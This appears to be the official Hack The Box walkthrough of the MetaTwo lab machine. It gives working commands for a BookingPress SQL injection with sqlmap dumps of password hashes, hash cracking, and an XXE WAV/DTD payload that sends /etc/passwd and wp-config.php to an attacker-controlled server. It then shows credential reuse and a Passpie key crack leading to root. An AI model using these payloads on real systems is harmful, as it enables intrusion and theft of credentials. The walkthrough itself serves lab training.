MetaTwo

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Enumeration

Nmap

We’ll run an Nmap scan to identify any open ports on the target host.

ports=$(nmap -p- --min-rate=1000 -T4 10.129.228.95 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.228.95 -v -oN nmap_tcp

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
|   256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_  256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open  http    nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The Nmap scan reveals that FTP is available on port 21, SSH is listening on port 22, and an Nginx web server is running on port 80.

HTTP

When we browse to port 80, we’re redirected to the domain metapress.htb. To resolve this locally, we’ll add an entry for metapress.htb in the /etc/hosts file, mapped to the target’s IP address.

echo "10.129.228.95 metapress.htb" | sudo tee -a /etc/hosts

Navigate to http://metapress.htb in the browser.

We see a link to the events page, and at the bottom of the site we can see that it is running WordPress.

We can use the curl command to enumerate Wordpress.

Version:

└──╼ $curl -s http://metapress.htb | grep WordPress
<meta name="generator" content="WordPress 5.6.2" />
                                Proudly powered by <a href="https://wordpress.org/">WordPress</a>.                      </div><!-- .powered-by -->

Themes:

└──╼ $curl -s http://metapress.htb | grep themes
<link rel='stylesheet' id='twenty-twenty-one-style-css'  href='http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1' media='all' />
<link rel='stylesheet' id='twenty-twenty-one-print-style-css'  href='http://metapress.htb/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.1' media='print' />
( Element.prototype.matches && Element.prototype.closest && window.NodeList && NodeList.prototype.forEach ) || document.write( '<script src="http://metapress.htb/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.1"></scr' + 'ipt>' );
<script src='http://metapress.htb/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.1' id='twenty-twenty-one-primary-navigation-script-js'></script>
<script src='http://metapress.htb/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.1' id='twenty-twenty-one-responsive-embeds-script-js'></script>

When we follow the link to the events page, we find an event scheduler service.

Let’s run the curl command to enumerate plugins.

└──╼ $curl -s http://metapress.htb/events/ | grep plugins                                      
<link rel='stylesheet' id='bookingpress_element_css-css'  href='http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/css/bookingpress_element_theme.css?ver=1.0.10' media=
'all' />   
<SNIP>

The site is running the BookingPress plugin version 1.0.10. While researching vulnerabilities, we identified that version 1.0.19 is affected by an Unauthenticated SQL Injection.

To proceed, we’ll extract the _wpnonce value as shown in the proof of concept.

└──╼ $curl -s http://metapress.htb/events/ | grep wpnonce
                                                                        var postData = { action:'bookingpress_generate_spam_captcha', _wpnonce:'2879e180c4' };
<SNIP>

We confirmed access to /wp-admin/admin-ajax.php by checking the robots.txt file and then manually browsing to the URL.

Next, we’ll run the following curl command to test the SQL injection, including the _wpnonce value.

└──╼ $curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=2879e180c4&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 08 Sep 2025 23:17:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.0.24
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin

[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]

The response confirms the SQL injection, so we can move on to using sqlmap, which automates the detection and exploitation of SQL injection vulnerabilities. As a first step, we’ll enumerate the available databases.

└──╼ $sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=2879e180c4&category_id=123&total_service=-111" -p total_service --level=5 --risk=3 --dbs
<SNIP>
available databases [2]:
[*] blog
[*] information_schema
<SNIP>

Two databases are returned: blog and information_schema. We’ll now focus on the blog database and enumerate its tables.

└──╼ sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=2879e180c4&category_id=123&total_service=-111" -p total_service --level=5 --risk=3 -D blog --tables
<SNIP>
Database: blog                                                                                                                                                                                
[27 tables]                                                                                                                                                                                   
+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |
| wp_options                           |
| wp_postmeta                          |
| wp_posts                             |
| wp_term_relationships                |
| wp_term_taxonomy                     |
| wp_termmeta                          |
| wp_terms                             |
| wp_usermeta                          |
| wp_users                             |
+--------------------------------------+

Let’s dump the contents of wp_users table.

└──╼ sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=2879e180c4&category_id=123&total_service=-111" -p total_service --level=5 --risk=3 -D blog -T wp_users --dump
<SNIP>
Table: wp_users
[2 entries]
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url             | user_pass                          | user_email            | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | http://metapress.htb | $P$B<SNIP>.TV. | admin@metapress.htb   | admin      | 0           | admin        | admin         | 2022-06-23 17:58:28 | <blank>             |
| 2  | <blank>              | $P$B4<SNIP>6Q70 | manager@metapress.htb | manager    | 0           | manager      | manager       | 2022-06-23 18:07:55 | <blank>             |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

The wp_users table contains the password hashes for the admin and manager. Save the hashes in a file.

admin:$P$B<SNIP>.TV.
manager:$P$B<SNIP>6Q70

Crack the hashes using John The Ripper.

└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt wp_hash
Created directory: /home/knuckl3s/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pa<SNIP>ar (manager)

We have cracked the password for manager. As shown in robots.txt, the default wordpress login pages exists at /wp-login sub-directory. We can log in as manager.

After logging in, we can see the Wordpress admin dashboard.

The site is running WordPress version 5.6.2. A quick Google search reveals a list of vulnerabilities for this release.

Since metapress.htb is using PHP version 8.0.24 (as identified with Wappalyzer), one noteworthy issue is this vulnerability, which relates to the Media Library being affected by an authenticated XXE (XML External Entity Injection) flaw impacting PHP 8.

payload.wav:

RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>>

xxe.dtd:

<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">

In the proof of concept, a relative path is used to retrieve the wp-config.php file. This is helpful, as it means we don’t need to know the absolute path. To proceed, we’ll need two files: payload.wav and evil.dtd.

First, we’ll create payload.wav with the payload below, which will trigger the download of the evil.dtd file on the remote host.

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.7:8080/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > paylaod.wav

Next, we’ll create evil.dtd with the following payload. When parsed by the remote host, this will cause it to send the base64-encoded contents of the /etc/passwd file to our local HTTP server.

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.7:8080/?p=%file;'>" >

Let’s start a Python web server on port 8080.

python3 -m http.server 8080

Upload the .wav file onto the Wordpress Media section.

After uploading the file, our web server receives a request containing the base64-encoded data.

10.129.228.95 - - [08/Sep/2025 19:49:56] "GET /evil.dtd HTTP/1.1" 200 -
10.129.228.95 - - [08/Sep/2025 19:49:57] "GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmF<SNIP>TA3OjY1NTM0Ojovc3J2L2Z0cDovdXNyL3NiaW4vbm9sb2dpbgo= HTTP/1.1" 200 -

Decoding the base64 string gives us the content of the /etc/passwd file.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin

We can see that the user jnelson exists on this host.

Next, we’ll attempt to retrieve the wp-config.php file, as it contains the WordPress configuration details. We can do this by updating the evil.dtd file with the following payload.

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.7:8080/?p=%file;'>" >

Repeat the same process and get the contents of the wp_config.php file.

<SNIP>
define( 'FS_METHOD', 'ftpext' );                                                         
define( 'FTP_USER', 'metapress.htb' );                                                   
define( 'FTP_PASS', '9NYS<SNIP>NvJ' );                                             
define( 'FTP_HOST', 'ftp.metapress.htb' );                                               
define( 'FTP_BASE', 'blog/' );                                                           
define( 'FTP_SSL', false );
<SNIP>

The wp-config.php file reveals the FTP credentials which we can use to login to the FTP server.

ftp 10.129.228.95

While enumerating the FTP file system, we find a file named send_email.php. After downloading and opening it, we discover another set of credentials inside.

<SNIP>
$mail->Username = "jnelson@metapress.htb";                 
$mail->Password = "Cb4_<SNIP>u@Ys";     
<SNIP>

We can login over SSH and obtain the user flag.

└──╼ [★]$ ssh jnelson@10.129.228.95
<SNIP>
jnelson@meta2:~$ ls
user.txt
jnelson@meta2:~$ cat user.txt
c2dc<SNIP>d431

Privilege Escalation

While enumerating the user’s home directory, we notice a .passpie folder. For further reference, we can consult the official documentation

jnelson@meta2:~$ ls -la
total 32
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25  2022 .
drwxr-xr-x 3 root    root    4096 Oct  5  2022 ..
lrwxrwxrwx 1 root    root       9 Jun 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 jnelson jnelson  220 Jun 26  2022 .bash_logout
-rw-r--r-- 1 jnelson jnelson 3526 Jun 26  2022 .bashrc
drwxr-xr-x 3 jnelson jnelson 4096 Oct 25  2022 .local
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25  2022 .passpie
-rw-r--r-- 1 jnelson jnelson  807 Jun 26  2022 .profile
-rw-r----- 1 root    jnelson   33 Sep  8 23:04 user.txt

The passpie export <export_file_destination> command exports the credentials saved in passpie in plaintext.

jnelson@meta2:~/.passpie$ passpie export password.db
Passphrase: 
Passphrase: 
Passphrase: 
Passphrase: 
Error: Wrong passphrase

When prompted for a passphrase, we realise we don’t know it. As Passpie relies on GnuPG, we check the .passpie directory and find a file named .keys.

jnelson@meta2:~/.passpie$ ls -al
total 24
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25  2022 .
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25  2022 ..
-r-xr-x--- 1 jnelson jnelson    3 Jun 26  2022 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26  2022 .keys
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25  2022 ssh

Looking at the contents of the .keys file, we see both public and private key.

jnelson@meta2:~/.passpie$ cat .keys
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQSuBGK4V9YRDADENdPyGOxVM7hcLSHfXg+21dENGedjYV1gf9cZabjq6v440NA1
<SNIP
=dqsF
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----

lQUBBGK4V9YRDADENdPyGOxVM7hcLSHfXg+21dENGedjYV1gf9cZabjq6v440NA1
<SNIP>
=7Uo6
-----END PGP PRIVATE KEY BLOCK-----

Let’s download this file to our local machine using scp.

└──╼ [★]$ scp jnelson@10.129.228.95:/home/jnelson/.passpie/.keys ./keys
jnelson@10.129.228.95's password: 
.keys

We’ll remove the public key block from the file, since only the private key is needed to crack the password. Next, we generate a password hash from the private GPG key using gpg2john and save it as keys.hash.

└──╼ [★]$ gpg2john keys > keys.hash

File keys

Use John The Ripper to crack the hash.

└──╼ [★]$ john --wordlist=/usr/share/wordlists/rockyou.txt keys.hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
b<SNIP>2         (Passpie)

We can now export the Passpie passwords in plaintext. Let’s review the contents of the password.db file.

jnelson@meta2:~$ passpie export ~/password.db
Passphrase: 
<SNIP>
jnelson@meta2:~$ cat password.db
credentials:
- comment: ''
  fullname: root@ssh
  login: root
  modified: 2022-06-26 08:58:15.621572
  name: ssh
  password: !!python/unicode 'p7qf<SNIP>o_0x'
- comment: ''
  fullname: jnelson@ssh
  login: jnelson
  modified: 2022-06-26 08:58:15.514422
  name: ssh
  password: !!python/unicode 'Cb4_<SNIP>u@Ys'
handler: passpie
version: 1.0

We will switch to root using this password. The root flag can be obtained from the /root directory.

jnelson@meta2:~$ su root
Password: 
root@meta2:/home/jnelson# cat /root/root.txt
7911<SNIP>3e83

References

https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357/
https://wpscan.com/wordpress/562/
https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5/
https://passpie.readthedocs.io/en/latest/
HTB Official Walkthrough for MetaTwo